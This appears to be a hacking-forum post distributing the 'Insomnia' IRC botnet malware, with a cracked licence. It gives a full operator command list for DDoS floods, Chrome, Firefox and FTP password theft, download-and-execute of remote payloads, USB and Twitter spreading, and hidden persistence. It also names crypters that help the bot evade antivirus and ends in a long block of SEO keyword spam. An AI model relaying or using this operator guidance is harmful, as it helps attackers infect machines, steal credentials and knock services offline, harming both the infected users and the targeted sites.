[GET] Insomnia IRC Bot (v2.5.0) - SSL | SOCKS5 | Chrome/FFox/FTP | USB/Twitter Spread [HWID Cracked] [100% Working]

Insomnia

Coded by: aadster

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

INSOMNIA v2.5.0 - About the Bot | 

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

INSOMNIA is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows, specifically XP machines with the latest updates up to Vista, Windows 7, and even Windows 8. Because these later versions of windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or low install rates.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

INSOMNIA v2.5.0 - Installation | 

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

Upon execution on the target machine, Insomnia will analyze its environment and decide upon the best form of installation. If the machine is housing AntiVirus Programs with specific heuristic and detection patterns, Insomnia may behave differently compared to machines than do not. If Insomnia manages to obtain Administrative rights on a machine, it will take advantage of it by setting a key in the HKLM, rather than HKCU, along with an automated firewall exception for the SOCKS server.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

INSOMNIA v2.5.0 - Core Features | 

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

- GeoIP for country detection with system locale fallback.

- SSL support for IRC connections

- SOCKS5 server with uPnP for a higher success rate and authentication

- Encrypted topic commands with generator (Updating)

- Registry monitor/persistence

- Start Up

- Bot quit messages are specific to the reason the process is ending

Windows is going to sleep...

Windows is shutting down...

Windows is logging off...

- WMI Query for installed AntiVirus and FireWall Software (Vista/7/8)

- Update with MD5 hash check.

- Download and Execute a .NET file in memory.

- Download and execute a file for X seconds before removing.

- RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.

- 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:

Apache Remote Memory Exhaustion (A.R.M.E.)

Slowloris

Layer7

Layer4

UDP

- BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware, Insomnia on the other hand is coded to watch and detect many different attributes that malware display, making this easily the most effective botkiller on HF.

- FTP Stealer

- IM Stealer

- PW Stealer (Chrome and Firefox)

- Color coding to improve readability.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

INSOMNIA v2.5.0 - Complete Command List | 

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

.v Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (KCU/HKLM).

.avinfo Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.

.chrome [keyword] Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).

.firefox [keyword] Outputs password data from Mozilla Firefox (latest).

.j #channel Joins a channel.

.p #channel Parts a channel.

.sort Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).

.unsort Reverses the above sort.

.permsort Admins join #admins, users join #users.

.twitter "MSG" Starts twitter spread with the given message. Please make sure your message is incased in quotes so it knows everything to send. More params/options for this coming soon.

.ftp Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.

.bk Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of insomnia under v2.0.0.

.bk -i Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.

.ruskill on/off New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.

.rc Tells the client to reconnect to IRC after 15 seconds have passed.

.up URL MD5 Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.

.dl URL Download and executes the given URL.

.dl URL ENVVAR Download and executes the given URL after dropping to a specific environment variable (ex. APPDATA, TEMP, etc). Case-insensitive.

.dl URL -t SECS Downloads target URL and waits for the given amount of time before removing the file, if it's still running.

.dl URL -m Downloads the target URL into memory without drops, and uses reflection to execute it. Sometimes if the app you download calls exit code of -1, it can kill the host process (insomnia), as well, however the persistence thread should restart it. This

command is only for those who have a good reason to use it.

.rm Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.

.m on/off Toggles mute (when on you won't get output from any commands).

.arme URL PORT SECS Starts the Apache Remote Execution DDoS on the target URL. 

.http URL PORT SECS Starts the HTTP (Application Layer 7) DDoS on the target URL.

.tcp URL PORT SECS Starts the TCP (Transport Layer 4) DDoS on the target URL.

.udp URL PORT SECS Starts the UDP packet flood on the target URL.

.slow URL PORT SECS Starts the Slowloris flood on the target URL.

.stop Aborts any active DDoS threads.

.read URL Reads encrypted topic commands from an external URL.

.socks Starts the SOCKS5 server. If you repeat this command again on systems that already have SOCKS server running, it will set a new random password for those connections and output.

.socks user pass Sets a custom user/pass for already active/new SOCKS servers.

.usb on/off Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.

.color <on/off> Toggles IRC color outputs.

.visit URL -h Visits the specified URL without showing the browser.

.visit URL Visits the specified URL in the default browser.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---

NEW FEATURES in 2.5.0 |

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---

New commands

- Added .visit URL <-h> to toggle visibility, will open in default browser.

- Added .color <on/off> to toggle IRC color output.

- DDoS commands have been renamed, see more info below.

Improved installation

- Insomnia now checks two new additional pathsets for install and will try each one in order until one is successful.

- Self-melt via MoveFileEx

- Installation executable drops are now intelligently named using a naming algorithm that constructs names from existing files on the system.

- Filesystem and registry permissions used to it's advantage [betamonkey].

Improved DDoS Methods

- Layer4 flood has been overhauled for better efficiency and stability. It's now called TCP flood to avoid confusion (.tcp)

- Layer7 flood has been tweaked to hold its power over longer delay periods. It's now called HTTP flood to avoid confusion (.http)

- UDP flood has been tweaked down to improve stability.

- Slowloris has been completely overhauled and effectiveness improved thanks to input from on it's performance. [Hunter S. Thompson & van1lle]

- ARME flood has been redesigned for efficiency and stability issues have been addressed.

Added a .visit command

-.visit URL -h (hidden)

-.visit URL (opens visible in default browser)

Addressed some imporant bugs with misc. functionality

- Fixed a bug with SOCKS5 that caused some HTML to be outputted to channel, this was caused by parsing the IP from WipMania API and not properly validating the regex result.

- Fixed compatibility issues with all versions of Fatalz IRCd.

- Fixed proper unicode character output with .firefox/.chrome password stealers.

- Improved USB LNK spread folder/binary hiding.

- Improved Installation fallback path choices.

- Improved Installation drop names (generated from random algorithm based on files in sys32).

- Improved Installation file protection using NTFS permissions.

- TaskManager monitor to hide "Show processes from all users" button. [betamonkey]

- Made an improvement to connection-hangs with irc.

- Minor botkiller improvements.

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

Other Information|

--­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­---­-

SOCKS5 Information

These are direct-connect socks that rely on the uPnP library to automate the port-forwarding process. They can work on many PCs without uPnP as well but it's not as common. I've averaged about 30/40% success rates on the SOCKS5 proxies, gaining about 30/40 proxies for every 100 bots. I'm working on a reverse-proxy application right now which will increase the success rate by far. Updates are free.

IRC Information

This was coded and tested using unrealIRCd 3.2.8.1+ but works on legacy versions. Insomnia conforms to the IRC rfc so any other servers should be fine, aside from a few tweaks that these unreal mods needed. Fatalz is once again working. 

SSL is recommended for IRC because all traffic and sent/received data is encrypted. This prevents any sniffing tools or bots from analyzing the traffic. You can make use of unrealircd channel mode: +z to only accept SSL connections. (+Z in the 3.2.9 RC).

- Bin size is ~200kb. This includes everything with the uPnP library for SOCKS5

- A list of Crypters that I have tested and can confirm work with Insomnia - Can Not Vouch If FUD:

DataProtector

Sikandar's crypter

TLTK

PM me to test your Crypter

incoming searches :

crypter
free fud crypter
fud crypter free
fud crypter download
ownz crypter
fud crypters
ud crypter
crypter stub
how to make a crypter
the crypter blueprint
polymorphic crypter
best fud crypter
buy crypter
online fud crypter
dark comet crypter
buy fud crypter
how to code a crypter
poison ivy crypter
software encryption
free crypter
crypters.net
galaxy crypter download
ud crypter download
ownz crypter download
crypters
download fud crypter
software for encryption
file crypter
undetectable crypter
exe crypter
crypters and binders
easy crypter
crypter software
encryption system
rdg tejon crypter
file crypt
crypter source code
codedom crypter
encryption of data
program encryption
stealth crypter v4
fly crypter download
encryption of files
online crypter fud
how to encryption
fud crypt
sk1d crypter
crypt files
advanced encryption standard algorithm
encrypt software free
yoda packer
crypting files
crypter fud download
make fud crypter
download crypters
easy crypter 2010
make crypter
program for encryption
code for encryption
private fud crypter
crypt fud
algorithms of cryptography
algorithm for cryptography
fly crypter usg
irc bot
irc bots
python irc bot
c# irc bot
php irc bot
windows irc bot
backdoor.irc.bot
eggdrop
irc chat bot
irc bot download
perl irc bot
irc bot commands
irc bot python
haskell irc bot
irc log bot
best irc bot
ruby irc bot
twisted irc bot
mirc bot
c irc bot
irc bot scripts
irc trivia bot
mirc bots
irc bot search
irc games
linux irc bot
php irc bot tutorial
irc bot c
irc bots download
chainsaw irc bot
irc channel bot
download irc bot
irc bot perl
irc spam bot
vb.net irc bot
trivia bot irc
irc xdcc bot
irc bot script
eggdrop irc bot
bash irc bot
irc bot ruby
simple python irc bot
how to chat
irc chat client
irc bot php
internet irc client
irc scripts
trivia irc bot
windows irc
eggdrop bot
irc bot source
irc bot games
internet bot
irc bot skeleton
ircbot
w32.ircbot
irc software
irc bot tutorial
w32 irc bot
irc chat windows
python irc bot tutorial
trojan irc bot
irc for windows
make your own irc channel
chat 2
irc bot server
most popular irc channel
irc bot virus
bot software
irc logging bot
simple irc bot
irc bot hosting
twitter irc bot
simple php irc bot
irc game bot
irc internet client
irc chat bots
irc bot host
irc bot linux
free chat bot
irc game bots
chat bot open source
irc bot windows
lua irc bot
irc rss bot
irc bot trivia
irc bot list
c irc bot skeleton
open source chat bot
internet irc
rss irc bot
irc chat scripts
irc bot in c
irc ai bot
irc weather bot
make irc bot
make your own chat bot
bot irc
unix irc
c irc bot tutorial
irc flood bot